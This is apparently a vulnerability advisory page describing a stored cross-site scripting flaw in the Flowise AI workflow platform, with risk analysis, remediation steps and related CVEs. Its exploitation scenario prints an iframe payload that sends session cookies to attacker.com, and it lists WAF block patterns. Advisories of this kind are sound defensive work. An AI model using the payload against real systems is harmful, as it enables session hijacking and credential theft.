AI Threat Alert
CVE-2025-71331: Flowise: XSS enables session hijacking in AI agent UI
MEDIUMFlowise before 3.0.8 contains a stored XSS flaw where attackers can inject arbitrary JavaScript through chat messages or by controlling external data sources returned by custom agent functions — requiring zero privileges and only that a victim view the chat. Flowise is commonly deployed as an internal AI workflow orchestration layer connected to LLM APIs, vector databases, and enterprise tools, meaning a stolen session grants attackers access to the entire agent configuration and potentially all downstream integrations. With 94 prior CVEs in this package, low attack complexity, and no privileges required, this is a higher-urgency patch than the Medium CVSS implies despite no current KEV listing or public exploit. Upgrade to Flowise 3.0.8 immediately; if patching is delayed, restrict the Flowise interface to internal networks, implement WAF rules blocking iframe and javascript: URI patterns in chat inputs, and audit custom agent functions for untrusted external data sources.
What is the risk?
Despite a CVSS of 6.1 (Medium), the risk to organizations is elevated by three factors: Flowise requires no attacker privileges and only user-interaction to exploit; Flowise sits at a privileged position in AI agent stacks with access to API keys, vector databases, and enterprise tool integrations; and the package has 94 prior CVEs indicating a pattern of weak security hygiene. The absence of a public exploit and KEV listing keeps urgency from being critical, but the trivial exploitation path and high-value target profile make prompt remediation necessary for any organization running Flowise in a production or semi-trusted environment.
How does the attack unfold?
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| Flowise | npm | — | No patch |
Do you use Flowise? You're affected.
How severe is it?
What is the attack surface?
What should I do?
6 steps-
Upgrade Flowise to 3.0.8 or later immediately — this is the authoritative fix per GHSA-4fr9-3x69-36wv.
-
If immediate patching is not possible, restrict the Flowise web interface to internal networks or VPN-only access to limit attacker surface.
-
Deploy WAF rules to reject requests containing
<iframe,javascript:,<script, andonerror=patterns in chat message payloads. -
Audit all custom agent functions and their configured external data sources — disable or sandbox any that pull from untrusted third-party URLs.
-
Rotate all API keys and credentials stored in or accessible via Flowise after patching.
-
Review Flowise access logs for anomalous session activity or unusual outbound requests that may indicate prior compromise.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2025-71331?
Flowise before 3.0.8 contains a stored XSS flaw where attackers can inject arbitrary JavaScript through chat messages or by controlling external data sources returned by custom agent functions — requiring zero privileges and only that a victim view the chat. Flowise is commonly deployed as an internal AI workflow orchestration layer connected to LLM APIs, vector databases, and enterprise tools, meaning a stolen session grants attackers access to the entire agent configuration and potentially all downstream integrations. With 94 prior CVEs in this package, low attack complexity, and no privileges required, this is a higher-urgency patch than the Medium CVSS implies despite no current KEV listing or public exploit. Upgrade to Flowise 3.0.8 immediately; if patching is delayed, restrict the Flowise interface to internal networks, implement WAF rules blocking iframe and javascript: URI patterns in chat inputs, and audit custom agent functions for untrusted external data sources.
Is CVE-2025-71331 actively exploited?
No confirmed active exploitation of CVE-2025-71331 has been reported, but organizations should still patch proactively.
How to fix CVE-2025-71331?
1. Upgrade Flowise to 3.0.8 or later immediately — this is the authoritative fix per GHSA-4fr9-3x69-36wv. 2. If immediate patching is not possible, restrict the Flowise web interface to internal networks or VPN-only access to limit attacker surface. 3. Deploy WAF rules to reject requests containing `<iframe`, `javascript:`, `<script`, and `onerror=` patterns in chat message payloads. 4. Audit all custom agent functions and their configured external data sources — disable or sandbox any that pull from untrusted third-party URLs. 5. Rotate all API keys and credentials stored in or accessible via Flowise after patching. 6. Review Flowise access logs for anomalous session activity or unusual outbound requests that may indicate prior compromise.
What systems are affected by CVE-2025-71331?
This vulnerability affects the following AI/ML architecture patterns: agent frameworks, AI chatbot interfaces, no-code AI workflow platforms, LLM orchestration layers.
What is the CVSS score for CVE-2025-71331?
CVE-2025-71331 has a CVSS v3.1 base score of 6.1 (MEDIUM).
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
AML.T0011 User Execution AML.T0049 Exploit Public-Facing Application AML.T0053 AI Agent Tool Invocation AML.T0080.001 Thread Compliance Controls Affected
What are the technical details?
Original Advisory
Flowise before 3.0.8 contains a cross-site scripting (XSS) vulnerability caused by insufficient input filtering in chat messages and custom agent functions. An attacker can inject malicious JavaScript by sending an iframe payload (e.g., <iframe src="javascript:alert(document.cookie)">) in a chat box, or by having a custom agent function return an XSS payload from an external website. The injected script executes in the victim's browser, enabling theft of cookies and session data.
Exploitation Scenario
An external attacker identifies an organization's Flowise deployment exposed on a non-public but reachable internal URL. The attacker submits a chat message containing `<iframe src="javascript:fetch('https://attacker.com/steal?c='+document.cookie)">` to an agent chatbot. When an internal developer or admin opens the chat history to review agent interactions, the iframe payload executes in their browser, silently exfiltrating their Flowise session cookie to the attacker. Using the hijacked session, the attacker accesses the Flowise workspace, reads all configured agent blueprints including embedded LLM API keys and database credentials, and modifies agent functions to establish persistent access or pivot into connected systems.
Weaknesses (CWE)
CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)
Primary
CWE-80 Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) CWE-80 — Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS): The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as "‹", ">", and "&" that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages.
- [Implementation] Carefully check each input parameter against a rigorous positive specification (allowlist) defining the specific characters and format allowed. All input should be neutralized, not just parameters that the user is supposed to specify, but all data in the request, including hidden fields, cookies, headers, the URL itself, and so forth. A common mistake that leads to continuing XSS vulnerabilities is to validate only fields that are expected to be redisplayed by the site. We often encounter data from the request that is reflected by the application server or the application that the development team did not anticipate. Also, a field that is not currently reflected may be used by a future developer. Therefore, validating ALL parts of the HTTP request is recommended.
- [Implementation] Use and specify an output encoding that can be handled by the downstream component that is reading the output. Common encodings include ISO-8859-1, UTF-7, and UTF-8. When an encoding is not specified, a downstream component may choose a different encoding, either by assuming a default encoding or automatically inferring which encoding is being used, which can be erroneous. When the encodings are inconsistent, the downstream component might treat some character or byte sequences as special, even if they are not special in the original encoding. Attackers might then be able to exploit this discrepancy and conduct injection attacks; they even might be able to bypass protection mechanisms that assume the original encoding is also being used by the downstream component. The problem of inconsistent output encodings often arises in web pages. If an encoding is not specified in an HTTP header, web browsers often guess about which encoding is being used. This can open up the browser to subtle X
Source: MITRE CWE corpus.
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N References
Timeline
Related Vulnerabilities
CVE-2025-59528 10.0 Flowise: Unauthenticated RCE via MCP config injection
Same package: flowise CVE-2026-46442 9.9 Flowise: sandbox escape enables authenticated RCE
Same package: flowise CVE-2025-61913 9.9 Flowise: path traversal in file tools leads to RCE
Same package: flowise CVE-2026-40933 9.9 Flowise: RCE via MCP stdio command injection
Same package: flowise CVE-2026-30821 9.8 flowise: Arbitrary File Upload enables RCE
Same package: flowise